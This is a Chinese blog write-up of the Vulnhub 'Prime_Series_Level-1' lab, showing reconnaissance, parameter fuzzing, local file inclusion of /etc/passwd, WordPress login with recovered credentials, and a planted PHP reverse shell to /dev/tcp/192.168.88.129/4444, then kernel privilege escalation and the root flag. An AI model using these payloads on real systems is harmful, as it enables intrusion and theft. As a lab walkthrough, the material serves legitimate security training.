Prime_Series_Level-1渗透流程

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量157 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131648398
版权

信息收集

主机探测

sudo nmap -sn 192.168.88.0/24

获取主机IP192.168.88.133

初步扫描 

sudo nmap -sT --min-rate 10000 -p- 192.168.88.133

 

详细信息扫描

sudo nmap -sT -sV -sC -O -p 22,80 192.168.88.133

可知

22端口  OpenSSH 7.2p2

80端口  Apache httpd 2.4.18

OS:疑似Ubuntu

漏洞脚本扫描 

可以看到80端口有一个慢速连接的DOS攻击,但是这个在渗透过程中不考虑。

该网站应该是使用了wordpress这个CMS。

UDP扫描 

无有效信息

目录扫描 

访问80端口,发现只是一张图片,源码里并没有什么有效信息。

进行目录扫描

sudo dirb http://192.168.88.133  

发现一些目录,可能/dev里面有东西。剩下的是大量的wordpress的目录。

访问/dev

再次尝试目录扫描

sudo dirb http://192.168.88.133 -X .txt,.php,.zip,.rat,.png,.jpg

发现了4个文件

 

 

访问/secret.txt

发现又有了新的提示,让在每个找到的php页面上进行模糊测试,来找到参数。
因为刚刚找到了index.php和image.php两个文件,所以这应该就是需要我们测试的。

 

渗透过程

模糊测试

尝试对index.php进行url的模糊测试

sudo wfuzz -c -w/usr/share/wfuzz/wordlist/general/common.txt http://192.168.88.133/index.php?FUZZ=teardrop

可以发现有很多的参数,根据提示,正确的参数应该只有一个,我们需要过滤出来。(这里我已经提前对image.php测试过了是找不到的)

尝试过滤

 

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.88.133/index.php?FUZZ=teardrop

得到一个file参数,或许应该就是它了。

尝试不传递值直接访问

发现有提示,但是应该没对,想到前面的location.txt,可能和它有关系。

 

访问发现提示我们用secrettier360这个参数在其它的php页面来获取更多的信息,这里的其它php页面应该就是刚刚的image.php,可能是让我们利用文件包含的漏洞。

 

文件包含利用

http://192.168.88.133/image.php?secrettier360=file:///etc/passwd
使用file://伪协议成功获取/etc/passwd文件内容,发现3个可登录用户

root

victor

saket

并且最后让我们在saket的家目录下获取password.txt

获取passsword.txt

内容为

follow_the_ippsec

这里应该要么是ssh登录密码,要么就是wordpress的后台登录密码,用户可能是passwd里面的3个可登录用户。

后台登录 

 访问wordpress页面发现用户是victor,猜测大概率后台用户名是victor,密码是follow_the_ippsec

尝试登录后台

使用victor follow_the_ippsec 成功登录

漏洞发现

检查是否主题是否有文件上传漏洞,发现没有写权限,那大概率是没有了。

检查是否有可以编辑插件或主题

最终在secure.php这里发现了可以编辑文件。

反弹shell

 

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/4444 0>&1'")?>

成功获取反弹shell

http://192.168.88.133/wordpress/wp-content/themes/twentynineteen/secret.php

 

 

 权限提升

 

查看权限和操作系统版本

权限是比较低的,操作系统版本是

Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu

该版本比较老,可能存在权限提升的漏洞。

使用searchsploit发现存在权限提示漏洞,尝试提权。

 

成功将文件传给靶机,这里一般传到/tmp目录,这里一般是具有读写执行权限的。

 

尝试编译

编译成功

运行,提权成功

 

获取flag

flag就在root目录下,root.txt        b2b17036da1de94cfb024540a8e7075a

总结 

首先端口扫描发现22,80端口,然后目录扫描找到,访问/dev得到提示,进一步目录扫描找到secure.txt。使用wfuzz进行模糊测试,找到file参数,获取location.txt,最后得到利用文件包含获取/etc/passwd的内容然后获取wordpress的登录密码。进入后台后利用主题文件可编辑的漏洞获取反弹shell,最后利用系统漏洞提权。

 

Teardrop、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
prime_series_level-1
m0_46982383的博客
07-23 766
FUZZ 、cp /bin/bash /tmp/challenge
Prime_Series_Level-1
cnmeimei的博客
02-09 410
0x01 先收集靶机端口,目录信息1)nmap扫描端口开启了ssh服务和apache服务,搜索相关漏洞只有一个ssh用户名枚举,先放着2)dirb爆破目录 dirb http://192.168.0.102 发现两个可以目录/dev目录内容:意思让我们更深层次的挖掘目录信息/wordpress 可知这是一个wp博客还有管理员登陆页面,但不知道账号密码0X02 按照以上信息和提示操作1) dirb爆破dirb http://192.168.0.102 -X .txt,.html,.php 得到一个s...
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1582
Vulnhub靶场Prime_Series_Level-1渗透
0x01--Prime_Series_Level-1靶场
growler67
09-16 1701
001–靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
vulnhub-prime_series_level_1渗透测试
遇事不决冲冲冲
11-22 6209
环境搭建 官网https://www.vulnhub.com/entry/prime-1,358/ 将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK )直接拖进来 思路 扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写
ACI_Prime_Time_for_Real-Time_Report.pdf
05-18
ACI_Prime_Time_for_Real-Time_Report
WXH_eprime_E-prime情绪图片刺激_eprime图片刺激_
10-01
一个小例子,是eprime情绪刺激图片范式,以供交流参考
20211126_ASUS_PRIME_B350-PLUS_驱动程序和工具软件.7z
11-29
01网络驱动程序-DRV_LAN_Realtek_8111x_SZ_TSD_W10_64_V...08-BIOS-PRIME-B350-PLUS-ASUS-5606.zip amd_vga_26.20.11015.1003_w1064.zip readme.txt 20211126_ASUS_PRIME_B350-PLUS_驱动程序和工具软件.7z ...
prime_factor_finder-开源
07-19
一个直接快速找到素因数的程序,我们正在尝试创建最快的算法(注意,这个软件是根据 WTFPL 授权的,许可证的副本在这个项目附带的所有 tarball 的 COPYING 文件中)
SNTFIBO_number_prime-fibonacci_
10-02
recognize the prime fibonacci-number
VulnHub Prime_Series_Level-1
人若无名,便可专心练剑
11-12 268
follow_the_ippsec应该就是一个密码,开始发现了开启了22端口,所以,试试ssh登录,账号用开始/etc/passwd上面的。成功读取并回显了/etc/passwd,浏览器的效果看的头晕,还是用curl看一下**,这个可以在互联网上搜索到wordpress的主题编辑页面的路径。,至于/themes前面的路径是啥,应该是wordpress主题的固定路径,也就是。提示我们,可以无密码的形式以root运行。这样应该就可以执行了,再次执行。dirb + X参数。发现,成功登录进去了。
vulnhub靶场练习:Prime_Series_Level-1
qq_60256199的博客
12-30 109
vulnhub靶场练习:Prime_Series_Level-1
Prime_Series靶场从探测到提权
cainsoftware的博客
09-15 1151
靶场开机就这 做的是NET的网卡跟我kali是一个网络 网络 192.168.34.0的 题目要求是同C段但是不知道ip地址 故直接nmap 扫描 目标服务器ip地址和开放服务和端口 没啥技术含量 可以看见ip为192.168.34.130的开放了 22 80 的2个服务 且网络容器是apache drib这里直接爆破目录 可见是一个wordpress的系统 二次扫描 -X 参数 [.txt][.php]的意思在爆破后缀添加 以.txt结尾和.php结...
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 828
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
vulnhub靶场-Prime1
ad12456的博客
03-30 2811
靶场练习,
等保测评和安全运维
weixin_64392888的博客
06-11 593
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 207
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 942
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
is_prime(7) -> True is_prime(100) -> False is_prime(1) -> True is_prime(2) -> True的编程
04-09
解决方案: def is_prime(n): if n < 2: return False for i in range(2, int(n ** 0.5) + 1): if n % i == 0: return False return True print(is_prime(7)) # True print(is_prime(100)) # False print(is_prime(1)) # False print(is_prime(2)) # True 注意:is_prime(1)应该返回 False,因为 1 不是质数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值